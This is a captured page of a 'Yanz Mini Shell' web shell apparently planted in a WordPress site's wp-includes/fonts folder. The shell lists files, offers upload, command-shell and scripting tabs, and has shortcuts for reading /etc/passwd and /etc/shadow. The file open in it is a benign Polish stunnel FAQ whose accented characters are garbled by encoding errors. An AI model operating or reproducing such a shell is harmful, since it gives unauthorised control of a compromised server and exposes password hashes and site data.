Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
hdhubreisen
public_html
wp-includes
fonts
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
<HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-2"> <TITLE>Gdy pojawiaj� si� k�opoty</TITLE> </HEAD> <BODY TEXT="#000000" BGCOLOR="#FFFFFF" LINK="#0000EF" VLINK="#51188E" ALINK="#FF0000"> <B>Q: </B>Pr�buje kompilowa� stunnel jednak dostaje nast�puj�ce komunikaty: <BR>stunnel.c:69: ssl.h: No such file or directory <BR>stunnel.c:71: bio.h: No such file or directory <BR>stunnel.c:72: pem.h: No such file or directory <BR>make: *** [stunnel.o] Error 1 <P><B>A:</B> S� dwie prawdopodobne przyczyny: nie masz zainstalowanego w systemie pakietu SSLeay lub pakiet nie znajduje sie w miejscu domy�lnym czyli<B> /usr/local/ssl. </B>Nale�y zainstalowa� SSLeay lub te� poprawi� Makefile tak by �cie�ka by�a prawid�owa. <BR> <HR WIDTH="100%"> <BR><B>Q:</B> Pr�buje uruchomi� stunnel jako wrapper dla httpd. Po wydaniu komendy: <B>stunnel 443 @localhost:80</B> demon si� nie uruchamia a w syslogu pojawia si� komunikat "<B>stunnel[2481]: getpeername: Socket operation on non-socket (88)"</B><B></B> <P><B>A</B>: Jest to b��d charakterystyczny dla Linuxa. Nale�y w pliku stunnel.c zmieni� lini�<B> #define INET_SOCKET_PAIR 1</B> na <BR><B>#define INET_SOCKET_PAIR 0</B> i zrekompilowa� program ponownie. <BR> <HR WIDTH="100%"> <BR><B>Q:</B> Stunnel nadal si� nie uruchamia a w syslogu pojawia si� komunikat "<B>stunnel[2525]: /usr/local/ssl/certs/localhost:80.pem: No such file or directory (2)</B>"<B></B> <P><B>A:</B> Nie posiadasz odpowiedniego certyfikatu dla demona. Stunnel w celu poprawnego dzia�ania <B>MUSI</B> posiada� certyfikat. W celu wygenerowania odpowiedniego certyfikatu nale�y wyda� komende: <B>/usr/local/ssl/bin/ssleay req -new -x509 -nodes -out server.pem -days 365 -keyout server.pem</B> b�d� te� u�y� <B>Makefile</B> do��czonego do programu stunnel i przy pomocy komendy <B>make cert </B>stworzy� certyfikat. Tak utworzony certyfikat (server.pem) nale�y umie�ci� w katalogu <B>/usr/local/ssl/certs</B> i utworzy� do� odpowiednie linki lub zmie� nazw� certyfikatu na wymagan� przez stunnel. <BR> <HR WIDTH="100%"> <BR><B>Q:</B> Wygenerowa�em odpowiedni certyfikat przy pomocy skryptu CA.sh, a stunnel <B>przy starcie prosi o podanie has�a</B>. Jak mo�na przekaza� has�o zabezpieczaj�ce certyfikat do programu ?<B></B> <P><B>A:</B> W chwili obecnej jest to niemo�liwe. Certyfikaty kt�rymi pos�uguje sie stunnel nie mog� by� zabezpieczane has�em. Przy tworzeniu certyfikatu nale�y u�y� opcji -nodes (lub utworzy� certyfikat przy pomocy makefile odstarczonego z programem). <BR> <HR WIDTH="100%"> <BR><B>Q:</B> Po uruchomieniu programu stunnel w syslogu pojawia si� komunikat: "<B>stunnel[2805]: WARNING: Wrong permissions on /usr/local/ssl/certs/localhost:80.pem</B>". Co jest nie tak ?<B></B> <P><B>A:</B> To tylko ostrze�enie ! Certyfikat nie powien da� si� odczyta� przez innych u�ytkownik�w systemu. Prawid�owe prawa dost�pu powinny by� nast�puj�ce: <B>-rw------ 1 root root 1370 Nov 8 1997 server.pem </B>(je�li uruchamiaj�cym stunnel jest root). <BR> <HR WIDTH="100%"> <BR><B>Q:</B> Probowa�em zrobi� tunelowanie po��czenia do demona <B>pop3</B>. Pomimo zrobienia prawid�owego wpisu do inetd.conf <BR>"spop3 stream tcp nowait root /usr/sbin/stunnel qpopper -s" stunnel nie dzia�a a w syslogu pojawia si� komunikat: <BR><B>inetd[2949]: spop3/tcp: unknown service.</B><B></B> <P><B>A: </B>Nie zrobi�e� dodatkowych wpis�w do pliku <B>/etc/services.</B> Zgodnie z rfc???? prawid�owymi portami na kt�rych dzia�aj� demony pos�uguj�ce si� SSL s�: <TABLE> <TR> <TD>https</TD> <TD>443/tcp</TD> <TD># HTTP over SSL </TD> </TR> <TR> <TD>ssmtp</TD> <TD>465/tcp</TD> <TD># SMTP over SSL </TD> </TR> <TR> <TD>snews</TD> <TD>563/tcp</TD> <TD># NNTP over SSL </TD> </TR> <TR> <TD>ssl-ldap</TD> <TD>636/tcp</TD> <TD># LDAP over SSL </TD> </TR> <TR> <TD>simap</TD> <TD>993/tcp</TD> <TD># IMAP over SSL </TD> </TR> <TR> <TD>spop3</TD> <TD>995/tcp</TD> <TD># POP-3 over SSL </TD> </TR> </TABLE> Je�li nie chesz robi� poprawek zamiast nazwy serwisu u�yj numeru portu na kt�rym on dzia�a. <BR> <HR WIDTH="100%"> <BR><B>Q:</B> Dobrze, zrobi�em wymagany wpis lecz w dalszym ciagu stunnel nie dzia�a, natomiast w syslogu pojawia sie wpis: <BR> <B>stunnel[3015]: execvp: No such file or directory (2). </B>Co jeszcze jest nie tak ?<B></B> <P><B>A:</B> Prawdopodone s� dwie przyczyny: pierwsza w twoim systemie nie ma demona dla ktorego zrobi�e� wpis w inetd.conf, <BR>(spop3 stream tcp nowait root /usr/sbin/stunnel qpopper -s) lub te� dany program jest w systemie, jednak �cie�ka dost�pu do niego nie jest wymieniona w zmiennej systemowej <B>$PATH</B>. Nale�y wi�c poprawi� zapis w inetd.conf uzupe�niaj�c o pe�na �cie�ke dost�pu do demona np. <B>spop3 stream tcp nowait root /usr/sbin/stunnel /usr/sbin/qpopper -s</B> <BR> <BR> </BODY> </HTML>
Free Space : 62576050176 Byte